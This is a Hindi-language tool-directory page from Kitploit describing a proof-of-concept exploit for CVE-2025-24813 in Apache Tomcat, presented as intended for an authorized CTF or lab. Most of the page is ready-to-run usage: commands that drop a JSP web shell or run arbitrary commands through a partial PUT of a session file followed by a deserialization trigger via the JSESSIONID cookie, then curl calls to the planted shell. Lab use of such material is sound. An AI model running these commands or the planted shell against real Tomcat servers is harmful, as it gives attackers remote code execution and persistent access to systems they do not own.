Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-24813 — java CVE के लिए सही payload | Kitploit
उपकरण/GitHubGitHub/loufa0/cve-2025-24813
भेद्यता स्कैनरशोषणवेब सुरक्षाCTFलर्निंग और शिक्षालैब और अभ्यास
GitHubloufa0/cve-2025-24813

CVE-2025-24813

java CVE के लिए सही payload

रिपॉजिटरी देखें
2 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-24813 Tomcat PoC

PoC एक अधिकृत CTF/लैब वातावरण के लिए है। यह CVE-2025-24813 का शोषण Tomcat सत्र फ़ाइल के आंशिक PUT लेखन के माध्यम से करता है, फिर JSESSIONID के साथ डिसीरियलाइज़ेशन ट्रिगर करता है।

पूर्वापेक्षाएँ

  • Python 3
  • Python मॉड्यूल requests
  • Java JDK (java और javac)
  • इस फ़ोल्डर में रखी गई शामिल फ़ाइल commons-collections-3.2.1.jar

ysoserial आवश्यक नहीं है।

फ़ाइलें

  • poc_cve_2025_24813.py: Python wrapper जो जनरेशन, अपलोड और ट्रिगर को स्वचालित करता है।
  • GenerateTomcatSessionPayload.java: CommonsCollections गैजेट युक्त एक मान्य Tomcat सत्र उत्पन्न करता है।
  • commons-collections-3.2.1.jar: गैजेट की निर्भरता।
  • sh.jsp: वैकल्पिक JSP शेल जो --drop-shell द्वारा तैनात किया जाता है।

उपयोग

डिफ़ॉल्ट वेबरूट /opt/tomcat/webapps/ROOT में एक JSP शेल जमा करें:

root@kitploit:~
./poc_cve_2025_24813.py http://TARGET:8080 \
  --session-id poc24813 \
  --drop-shell \
  --shell-name sh.jsp

शेल जमा किए बिना सीधी कमांड निष्पादित करें:

root@kitploit:~
./poc_cve_2025_24813.py http://TARGET:8080 \
  --session-id cmd24813 \
  --cmd 'id > /opt/tomcat/webapps/ROOT/rce.txt'

यदि वेबरूट अलग है:

root@kitploit:~
./poc_cve_2025_24813.py http://TARGET:8080 \
  --drop-shell \
  --webroot /path/to/webroot \
  --shell-name sh.jsp

यदि JAR स्थानांतरित किया गया है, तो उसका पथ निर्दिष्ट करें:

root@kitploit:~
./poc_cve_2025_24813.py http://TARGET:8080 \
  --jar /path/to/commons-collections-3.2.1.jar \
  --drop-shell

शोषण के बाद

यदि --drop-shell सफल होता है:

root@kitploit:~
curl --get --data-urlencode 'cmd=id' http://TARGET:8080/sh.jsp
curl --get --data-urlencode 'cmd=cat /opt/tomcat/user.flg' http://TARGET:8080/sh.jsp

लक्ष्य-पक्ष की शर्तें

  • असुरक्षित Tomcat संस्करण।
  • DefaultServlet लिखने योग्य, सामान्यतः readonly=false।
  • आंशिक PUT का समर्थन।
  • PersistentManager और FileStore के माध्यम से स्थायी सत्र।
  • सर्वर-पक्ष पर उपलब्ध गैजेट चेन, यहाँ commons-collections।

अपलोड के दौरान अपेक्षित व्यवहार अक्सर HTTP 409 Conflict होता है:

root@kitploit:~
PUT /<session-id>/session
Content-Range: bytes 0-1000/1200

फिर डिसीरियलाइज़ेशन निम्न के साथ ट्रिगर होता है:

root@kitploit:~
Cookie: JSESSIONID=.<session-id>
टूल डाउनलोड करें